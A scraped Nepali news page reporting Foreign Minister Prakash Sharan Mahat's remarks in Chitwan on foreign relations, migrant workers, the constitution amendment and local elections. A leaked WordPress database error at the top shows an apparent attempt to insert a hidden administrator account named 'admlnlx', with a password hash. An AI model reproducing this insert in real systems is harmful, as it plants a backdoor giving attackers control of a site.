WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BVsjqK4DCQMRmrDvbRSnYcxT/qk47D1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 01:48:48', '', 'admlnlx', 'admlnlx')
चितवन,माघ ६ –
परराष्ट्र मन्त्री डा प्रकाशशरण महतले सरकारले ध्यान पुग्न नसकेका महत्वपूर्ण देशहरुसँगको सम्बन्ध सुधारका लागि अहिलेको सरकार लागिपरेको बताउनुभएको छ ।
आज यहाँ पत्रकारसँग कुराकानी गर्दै उहाँले सरकारको ध्यान नपुगेका तर विकास निर्माणका दृष्टिकोणले महत्वपूर्ण रहेका देशहरुसँग सम्बन्ध सुधार गर्दै छिमेकी राष्ट्रहरुसँग मिलेर अगाडि बढ्न सरकारले काम गरिरहेको बताउनुभयो ।
विदेशमा रहेका नेपाली कामदारको सुरक्षा, हकहित र शोषण अन्त्यका लागि मन्त्रालयले विदेशी नियोगसँग छलफल जारी राखेको मन्त्री महतले बताउनुभयो । पछिल्लो समयमा सडक राजनीति बढी भइरहेको र यसले नेपालको हित नगर्ने उहाँको भनाइ थियो ।
संविधान संशोधनका विषयमा दलहरुबीच सहमति जुटाएर अघि बढ्ने पनि उहाँले बताउनुभयो । संविधान कार्यान्वयनका लागि स्थानीय निकाय र प्रदेशको निर्वाचन आवश्यक रहेको उहाँको भनाइ थियो ।
स्थानीय निकायको निर्वाचन वैशाख वा जेठमा गरेपछि देश विकासले गति लिने मन्त्री महतले बताउनुभयो । – रासस